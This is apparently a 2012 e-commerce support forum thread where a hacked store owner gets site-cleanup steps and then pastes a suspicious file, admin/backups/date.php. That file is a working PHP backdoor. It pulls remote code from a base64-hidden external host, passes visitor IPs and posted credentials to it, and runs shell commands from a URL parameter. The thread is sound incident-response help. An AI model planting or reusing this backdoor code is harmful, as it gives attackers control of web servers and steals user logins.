I haven't edited/changed any files recently except for the the "year" shown on the page footer.
Now when I go to my website, I get a warning says that the website page was reported as an attack page and therefore was blocked.
Also, in the search results, google is showing:
"This site may harm your computer"
PLEASE HELP. I don't know what should I do to solve this. I need an urgent help PLEASE.
Latest News: (loading..)
0
6 replies to this topic
#2
DunWeb
-
- Members
- 12,733 posts
The Censored One
- Real Name:Chris
- Gender:Male
- Location:Ontario, Canada
Posted 19 July 2012 - 08:08 PM
@pulsecheck
Follow these steps to clean and secure your website:
1) Lock down your site by using an .htaccess password so your customers are not attacked by the hackers code.
2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'.
3) Delete the files on your hosting account before uploading the clean files.
4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.
5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE
6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444
7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'
8) Remove the .htaccess password protection so your customers can resume making purchases from your website.
9) Monitor your website using the newly installed contributions to prevent future hacker attacks.
10) If you feel you can not perform any of the above steps, you should seek professional help to ensure all malware is removed.
Chris
Follow these steps to clean and secure your website:
1) Lock down your site by using an .htaccess password so your customers are not attacked by the hackers code.
2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64','eval','decode'.
3) Delete the files on your hosting account before uploading the clean files.
4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.
5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE
6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444
7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'
8) Remove the .htaccess password protection so your customers can resume making purchases from your website.
9) Monitor your website using the newly installed contributions to prevent future hacker attacks.
10) If you feel you can not perform any of the above steps, you should seek professional help to ensure all malware is removed.
Chris
#3
Posted 19 July 2012 - 08:35 PM
Many thanks Chris for your quick response. Actually I'm a newbie and I don't know how to lock down my site using an .htaccess password?
Sorry if this may seem a silly question, but I'm in a mess. I would be appreciated if you could guide me.
I'm also willing to pay to get a professional help.
Thanks in advance.
Sorry if this may seem a silly question, but I'm in a mess. I would be appreciated if you could guide me.
I'm also willing to pay to get a professional help.
Thanks in advance.
#4
Posted 19 July 2012 - 08:35 PM
@DunWeb
Many thanks Chris for your quick response. Actually I'm a newbie and I don't know how to lock down my site using an .htaccess password?
Sorry if this may seem a silly question, but I'm in a mess. I would be appreciated if you could guide me.
I'm also willing to pay to get a professional help.
Thanks in advance.
Many thanks Chris for your quick response. Actually I'm a newbie and I don't know how to lock down my site using an .htaccess password?
Sorry if this may seem a silly question, but I'm in a mess. I would be appreciated if you could guide me.
I'm also willing to pay to get a professional help.
Thanks in advance.
#5
Posted 29 July 2012 - 02:58 AM
hi all,
A newbie here needs your advice please. I've been doing my best trying to follow the above-mentioned steps to get me website clean. I have found this file:
admin/backups/date.php
**********************************************
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
*******************************************
As you see, the file contains "base64_decode".
Is it a hacker code??
Should I delete the whole file?
Please advise.
Thanks
A newbie here needs your advice please. I've been doing my best trying to follow the above-mentioned steps to get me website clean. I have found this file:
admin/backups/date.php
**********************************************
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
*******************************************
As you see, the file contains "base64_decode".
Is it a hacker code??
Should I delete the whole file?
Please advise.
Thanks
#6
DunWeb
-
- Members
- 12,733 posts
The Censored One
- Real Name:Chris
- Gender:Male
- Location:Ontario, Canada
Posted 29 July 2012 - 03:07 AM
#7 ONLINE
Posted 29 July 2012 - 03:20 AM
pulsecheck, on 29 July 2012 - 02:58 AM, said:
As you see, the file contains "base64_decode".
Is it a hacker code??
Should I delete the whole file?
Is it a hacker code??
Should I delete the whole file?
Recommended SEO Addons:
Most Important: Header Tags SEO - Ultimate SEO V 2.2d
All SEO Addons: Recommended SEO Addons
Support Links:
Finding relevant link exchanges - Headers Already Sent - What does it cost? -What's my version? - How to change titles? - Preventing HotLinking
Most Important: Header Tags SEO - Ultimate SEO V 2.2d
All SEO Addons: Recommended SEO Addons
Support Links:
Finding relevant link exchanges - Headers Already Sent - What does it cost? -What's my version? - How to change titles? - Preventing HotLinking
